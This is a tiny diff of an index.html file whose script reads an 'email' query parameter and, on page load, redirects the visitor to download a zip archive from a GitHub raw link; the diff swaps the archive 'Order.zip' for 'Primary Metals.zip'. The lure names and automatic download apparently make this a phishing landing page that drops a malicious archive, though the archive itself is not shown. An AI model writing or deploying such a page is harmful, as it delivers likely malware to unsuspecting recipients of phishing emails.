--- a/index.html
+++ b/index.html
@@ -1,4 +1,4 @@
-><script>const urlParams = new URLSearchParams(window.location.search);
+<script>const urlParams = new URLSearchParams(window.location.search);
 const id = urlParams.get('email');
 
-window.location.href = `https://github.com/rdedt09/dd/raw/refs/heads/main/Order.zip`;</script>
+window.location.href = `https://github.com/ttrrtrterdddd/fdseet/raw/refs/heads/main/Primary%20Metals.zip`;</script>
